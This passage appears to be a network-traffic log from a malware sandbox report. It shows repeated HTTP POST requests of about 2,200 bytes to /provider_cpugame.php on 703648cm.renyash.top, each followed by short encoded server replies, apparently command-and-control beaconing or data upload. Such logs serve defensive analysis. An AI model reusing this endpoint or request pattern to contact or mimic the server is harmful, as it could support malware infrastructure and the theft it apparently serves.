                                                                                                                      Dec 20, 2024 21:18:20.564122915 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:21.349446058 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:19 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 11 23 3b 2d 0f 33 3f 26 09 3c 0d 01 54 26 06 27 09 2c 0e 21 07 31 2e 32 01 2a 3b 00 1b 3f 23 29 1d 25 0d 0f 55 24 3d 23 57 26 24 2b 51 03 10 22 15 32 3e 26 1d 27 2f 2c 56 26 23 33 00 36 00 20 40 21 1d 00 55 34 39 2a 0a 27 00 00 0f 2a 39 2a 02 3e 1a 09 03 3c 57 2f 5d 3f 3d 20 52 09 16 26 12 29 2b 3f 09 30 2b 20 55 28 04 20 5c 25 16 0f 15 3e 3d 3d 0c 2b 3e 3b 0e 3e 06 20 51 26 0e 22 5d 2a 2a 29 5c 25 04 0e 19 27 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %#;-3?&<T&',!1.2*;?#)%U$=#W&$+Q"2>&'/,V&#36 @!U49*'*9*><W/]?= R&)+?0+ U( \%>==+>;> Q&"]**)\%'(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:21.350358963 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:21.758316994 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:22.181981087 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:20 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1e 20 5d 2e 55 24 3f 0f 57 3c 0a 34 0d 24 2f 09 43 3b 23 32 17 31 00 3a 01 3f 3b 32 50 29 1d 31 5a 31 20 2d 52 33 13 24 0f 25 0e 2b 51 03 10 22 5d 25 3e 32 5e 24 3f 2c 10 33 30 30 58 21 10 06 09 23 30 2d 0e 20 17 2d 56 24 10 32 0a 3d 29 3d 5e 3e 34 37 03 2a 32 34 01 3d 17 20 52 09 16 25 0d 2a 2b 38 13 24 2b 23 0e 2b 2e 3c 5d 31 28 00 09 3d 3d 29 0b 2a 3e 2c 1f 2a 59 37 0b 32 30 0c 5b 2a 04 21 5a 26 29 3c 19 27 12 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: % ].U$?W<4$/C;#21:?;2P)1Z1 -R3$%+Q"]%>2^$?,300X!#0- -V$2=)=^>47*24= R%*+8$+#+.<]1(==)*>,*Y720[*!Z&)<'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:22.182744026 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:22.589663982 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:23.016858101 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:21 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0c 34 02 2a 1f 27 2f 0b 1a 28 30 28 0c 31 06 24 1a 2f 1e 21 05 25 10 29 15 2b 05 21 0e 3d 20 2d 13 26 0d 26 0d 24 13 3b 1d 26 34 2b 51 03 10 21 04 31 03 32 5f 24 3f 0e 10 30 0d 20 58 21 3d 3b 18 23 23 32 57 37 5f 3a 0f 30 3e 0b 51 3d 29 25 10 2a 1d 33 03 3c 31 05 15 3e 3d 20 52 09 16 26 50 3d 06 24 56 33 06 2c 12 3c 2d 0a 14 31 28 2e 0b 2a 2e 31 0e 3f 2e 2c 55 29 01 1d 0e 25 23 32 5d 2a 14 0b 5e 25 2a 38 56 24 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &4*'/(0(1$/!%)+!= -&&$;&4+Q!12_$?0 X!=;##2W7_:0>Q=)%*3<1>= R&P=$V3,<-1(.*.1?.,U)%#2]*^%*8V$&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:23.017628908 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2204
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:23.423892975 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:24.137383938 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:22 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1e 34 2b 0b 0e 33 2f 2e 0b 28 23 23 1d 24 3c 2c 1c 2f 1e 3d 07 26 2e 3a 00 28 3b 0c 15 2a 33 26 03 32 0d 26 0e 24 04 30 0f 25 0e 2b 51 03 10 22 5f 25 04 22 5b 24 59 33 0b 27 33 2b 04 21 3d 3b 18 22 33 3e 1c 21 29 21 57 27 00 3d 1b 29 07 3d 59 2a 1a 0d 05 3c 32 37 5d 3f 2d 20 52 09 16 26 56 28 3b 34 1c 30 28 2f 08 28 03 23 05 26 16 3e 09 29 03 00 10 2a 3e 20 1d 2a 01 3b 0f 25 20 36 10 3e 03 36 04 31 04 2f 09 27 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %4+3/.(##$<,/=&.:(;*3&2&$0%+Q"_%"[$Y3'3+!=;"3>!)!W'=)=Y*<27]?- R&V(;40(/(#&>)*> *;% 6>61/'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:24.138127089 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:24.545274019 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:25.303221941 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:23 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 57 37 02 2e 53 24 11 2e 09 2b 0d 05 1c 24 3f 27 45 2e 23 31 07 25 2e 36 00 28 05 25 0b 3d 23 21 5f 24 20 31 11 25 3d 01 53 26 34 2b 51 03 10 21 06 26 3d 0f 06 24 3c 2b 0f 33 20 2c 5f 21 00 38 41 21 1d 32 57 37 07 00 0f 27 00 2d 15 3d 39 2d 5f 3e 1a 2c 16 3f 22 27 14 3d 3d 20 52 09 16 26 56 28 3b 27 0c 25 2b 28 54 28 2e 2c 14 25 28 29 56 29 3d 26 53 3f 00 3b 0a 2b 3f 3f 08 24 23 2a 59 2a 3a 0b 5e 26 04 38 57 27 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %W7.S$.+$?'E.#1%.6(%=#!_$ 1%=S&4+Q!&=$<+3 ,_!8A!2W7'-=9-_>,?"'== R&V(;'%+(T(.,%()V)=&S?;+??$#*Y*:^&8W'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:25.309279919 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:25.716483116 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:26.447379112 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:24 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 54 20 05 0b 0f 24 3f 0f 1b 3c 0d 20 0f 31 01 2b 44 3b 33 35 00 25 00 14 01 3c 15 04 52 2a 0a 3e 00 26 33 32 0d 24 03 01 1e 32 34 2b 51 03 10 21 06 25 04 3e 5a 30 3f 3f 0b 24 0a 3c 1b 36 3d 28 08 35 1d 00 1c 23 39 08 0a 24 2d 21 1b 3e 00 21 58 29 1d 2b 06 28 57 2b 16 2a 07 20 52 09 16 25 0e 3e 38 15 08 25 28 05 08 29 3d 2f 07 25 28 29 1b 3d 3d 35 0c 28 00 02 53 3d 06 28 52 24 23 3e 1e 29 2a 3a 06 25 04 23 0a 24 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %T $?< 1+D;35%<R*>&32$24+Q!%>Z0??$<6=(5#9$-!>!X)+(W+* R%>8%()=/%()==5(S=(R$#>)*:%#$8&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:26.457667112 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:26.865591049 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:27.299772978 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:25 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 53 37 05 36 55 26 3f 21 18 28 33 33 56 31 2c 2f 44 2f 0e 21 00 26 2e 3d 5d 2b 3b 0c 56 3e 0d 32 03 26 23 0f 11 24 03 2b 10 32 1e 2b 51 03 10 22 5e 31 3d 0c 5e 24 01 34 1e 27 33 27 01 20 3d 20 08 22 1d 32 1d 37 07 3e 0b 25 2e 2d 50 2a 17 3d 5b 3e 37 30 16 2a 31 28 01 2a 3d 20 52 09 16 26 51 29 2b 3f 0e 30 01 24 51 2b 5b 20 5c 31 3b 3e 0f 3e 03 03 0c 2b 3d 20 57 3e 2f 24 1a 26 0e 36 10 3d 04 00 07 31 03 24 1a 30 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %S76U&?!(33V1,/D/!&.=]+;V>2&#$+2+Q"^1=^$4'3' = "27>%.-P*=[>70*1(*= R&Q)+?0$Q+[ \1;>>+= W>/$&6=1$08&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:27.300810099 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:27.707190037 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:28.442058086 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:26 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1c 37 15 35 0b 33 2f 39 15 3f 30 2b 51 24 3c 24 18 2c 33 2a 5e 32 3d 25 5e 3c 3b 32 18 3d 55 21 13 24 33 3d 1f 24 3d 01 1f 24 24 2b 51 03 10 22 5f 26 3d 07 03 33 06 23 0f 27 55 2c 1b 21 2e 0e 08 22 1d 2e 51 23 00 2a 0d 27 2d 32 09 2a 39 03 5f 2a 42 2c 5d 3c 1f 28 01 2a 2d 20 52 09 16 26 51 29 28 24 1d 30 06 23 0d 28 3d 28 17 32 16 35 57 3e 3d 29 0a 2b 00 2c 54 3e 2c 3b 08 31 0e 2d 03 3e 04 3e 02 31 39 24 53 27 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %753/9?0+Q$<$,3*^2=%^<;2=U!$3=$=$$+Q"_&=3#'U,!.".Q#*'-2*9_*B,]<(*- R&Q)($0#(=(25W>=)+,T>,;1->>19$S'(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:28.442929029 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:28.849790096 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:29.329135895 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:27 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1f 20 2b 0f 0a 27 01 03 52 29 20 38 0d 26 2c 23 0b 2c 1e 2a 58 26 00 35 5c 3f 38 2d 09 3d 0a 31 1d 31 33 0c 0a 27 13 06 0d 31 24 2b 51 03 10 22 14 32 5b 2e 5f 27 01 37 0f 30 33 33 00 22 58 38 07 35 0a 32 55 20 29 3a 0b 25 3d 31 56 29 07 3d 5b 2a 37 37 07 3f 21 28 06 29 07 20 52 09 16 25 09 29 06 15 0c 24 28 2c 1c 28 03 3f 05 25 01 21 53 3e 04 3e 54 2a 2e 38 53 3e 3f 28 51 32 30 35 01 28 2a 39 5e 25 04 23 08 30 12 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: % +'R) 8&,#,*X&5\?8-=113'1$+Q"2[._'7033"X852U ):%=1V)=[*77?!() R%)$(,(?%!S>>T*.8S>?(Q205(*9^%#0&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:29.330091000 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:29.744195938 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:30.438400030 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:28 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 11 34 2b 32 1c 30 06 25 56 28 0a 33 51 25 3c 38 1d 2f 09 3d 05 31 3d 29 5e 2b 2b 21 0b 3d 1d 3d 5e 25 1d 08 0d 24 13 33 52 25 34 2b 51 03 10 21 07 25 2e 3d 00 27 3c 20 1e 27 1d 27 04 36 3e 05 18 36 33 2a 1e 23 00 21 53 33 3e 3a 0b 3e 00 31 59 2a 24 3c 5e 2b 31 37 15 3e 2d 20 52 09 16 26 1d 3d 2b 2b 09 30 28 23 0c 2b 2e 3c 5e 32 38 2d 1a 28 3d 2d 0e 28 3d 27 0d 29 06 3b 0f 24 20 31 02 28 29 25 19 31 03 38 50 30 12 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %4+20%V(3Q%<8/=1=)^++!==^%$3R%4+Q!%.='< ''6>63*#!S3>:>1Y*$<^+17>- R&=++0(#+.<^28-(=-(=');$ 1()%18P0&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:30.439286947 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:30.846231937 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:31.556838036 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:29 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 53 37 38 21 0f 30 3f 2e 0f 28 0a 38 0d 25 2c 3f 09 2f 56 36 17 24 3d 21 5f 28 2b 25 09 3d 23 31 5e 25 1d 2e 0e 25 3d 37 1e 32 1e 2b 51 03 10 22 15 32 04 39 06 30 01 23 0f 24 0d 20 5f 35 3d 38 0a 21 30 22 54 23 07 0f 1f 33 00 32 0b 28 29 25 13 2a 24 30 5f 28 21 24 04 29 07 20 52 09 16 26 1d 29 5e 20 50 24 28 09 09 3c 2e 27 04 25 01 2d 52 3d 3e 29 0b 2a 3e 38 56 3d 3c 3c 52 31 30 00 58 3e 14 35 5e 26 2a 2c 52 30 12 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %S78!0?.(8%,?/V6$=!_(+%=#1^%.%=72+Q"290#$ _5=8!0"T#32()%*$0_(!$) R&)^ P$(<.'%-R=>)*>8V=<<R10X>5^&*,R0&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:31.557864904 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:31.980237007 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:32.692260981 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:30 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 57 20 5d 35 0d 27 11 32 0f 3c 20 27 1f 25 59 2c 18 2e 30 29 04 31 3e 29 1a 28 5d 22 51 3d 0d 39 58 31 23 3e 0d 30 2e 2f 56 31 34 2b 51 03 10 22 5d 24 2d 08 58 30 01 20 55 27 0d 38 5c 22 07 27 1a 36 23 32 54 20 07 04 0f 25 3d 21 52 3d 29 00 03 29 0a 02 16 28 57 33 5f 3e 17 20 52 09 16 26 57 29 38 28 51 30 3b 2b 09 2b 03 28 5c 25 28 32 0a 29 3d 0f 0f 2b 3e 2c 55 2a 11 38 51 25 0e 04 10 2a 04 25 17 31 2a 09 0b 33 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %W ]5'2< '%Y,.0)1>)(]"Q=9X1#>0./V14+Q"]$-X0 U'8\"'6#2T %=!R=))(W3_> R&W)8(Q0;++(\%(2)=+>,U*8Q%*%1*38&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:32.693217039 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:33.102788925 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:33.824527979 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:31 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1f 23 3b 0b 0b 30 11 3d 18 29 30 27 1f 32 3c 3f 40 2e 30 31 01 26 00 31 5d 2a 3b 0b 0f 29 30 3d 10 25 1d 03 1e 27 3e 2c 0b 32 1e 2b 51 03 10 21 07 25 2d 32 5b 26 2c 34 55 24 30 30 15 36 10 0a 09 22 1d 03 09 23 5f 36 0f 25 2e 0b 57 29 5f 21 59 3e 34 06 15 3f 31 37 16 3d 2d 20 52 09 16 25 08 3e 06 1d 0e 30 38 20 1d 3f 13 27 06 25 28 08 0e 2a 3d 36 1e 28 2d 23 0e 3e 01 16 1b 32 09 3e 5b 2a 14 08 05 24 39 20 50 24 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %#;0=)0'2<?@.01&1]*;)0=%'>,2+Q!%-2[&,4U$006"#_6%.W)_!Y>4?17=- R%>08 ?'%(*=6(-#>2>[*$9 P$&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:33.825690031 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:34.232551098 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:34.938611031 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:33 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 54 20 3b 0c 57 33 01 04 08 2b 0d 01 1f 25 2f 3f 06 2e 30 2e 17 25 58 3a 04 28 3b 0c 1a 2a 33 3e 03 25 23 03 1e 30 2e 2b 55 25 0e 2b 51 03 10 22 16 24 3e 2e 13 27 2f 06 55 33 23 20 5d 20 3e 09 1c 22 23 0f 0e 20 39 39 57 27 10 0f 1b 29 39 2d 1d 3d 0a 27 03 3f 31 2b 59 29 07 20 52 09 16 26 1c 3e 5e 34 57 25 3b 38 56 3f 3d 20 14 24 28 3d 15 29 2d 26 52 3f 2e 27 0c 29 2f 3f 0a 31 23 36 10 3d 2a 25 5f 31 2a 37 08 27 12 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %T ;W3+%/?.0.%X:(;*3>%#0.+U%+Q"$>.'/U3# ] >"# 99W')9-='?1+Y) R&>^4W%;8V?= $(=)-&R?.')/?1#6=*%_1*7'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:34.939445019 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:35.346198082 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:36.060904026 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:34 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1c 37 02 31 0c 24 01 0f 51 28 20 24 0d 26 3f 0d 06 38 0e 3e 17 26 07 35 5f 3f 05 0b 08 3f 20 25 13 32 30 35 56 27 13 2f 1f 25 1e 2b 51 03 10 21 06 32 3d 0c 58 27 3c 2f 0a 27 0a 20 16 22 3e 09 18 22 0a 22 13 23 39 3a 0e 30 07 21 57 3d 29 3d 59 29 37 3c 17 28 57 3b 5c 3f 3d 20 52 09 16 26 55 28 38 28 51 33 5e 34 54 29 2d 3c 5e 26 28 31 15 29 3d 32 55 2a 3e 02 53 3d 3f 27 0e 25 23 36 58 3d 2a 0f 5b 26 29 34 53 30 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %71$Q( $&?8>&5_?? %205V'/%+Q!2=X'</' ">""#9:0!W=)=Y)7<(W;\?= R&U(8(Q3^4T)-<^&(1)=2U*>S=?'%#6X=*[&)4S0&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:36.063298941 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:36.470324039 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:37.184969902 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:35 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 56 34 02 31 0d 24 11 2d 50 2b 0a 2b 54 24 3c 3c 1d 3b 33 29 01 26 58 26 00 3f 28 2d 0f 2a 23 0b 10 26 55 3e 0e 27 2d 28 0c 25 1e 2b 51 03 10 21 04 26 3d 3a 5f 27 3c 28 1f 27 1d 02 5e 22 10 37 19 22 0a 3d 0d 23 29 22 0b 24 3e 04 0b 3d 29 2d 12 2a 1a 2f 06 2a 22 33 5c 3e 3d 20 52 09 16 25 0c 29 16 33 08 33 3b 20 56 29 2e 3c 58 32 16 31 52 3d 3d 04 52 2a 2d 2c 53 2a 11 2b 0e 24 30 22 1e 28 29 29 19 26 39 3b 08 27 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %V41$-P++T$<<;3)&X&?(-*#&U>'-(%+Q!&=:_'<('^"7"=#)"$>=)-*/*"3\>= R%)33; V).<X21R==R*-,S*+$0"())&9;'8&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:37.187195063 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:37.597022057 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:38.013987064 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:36 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
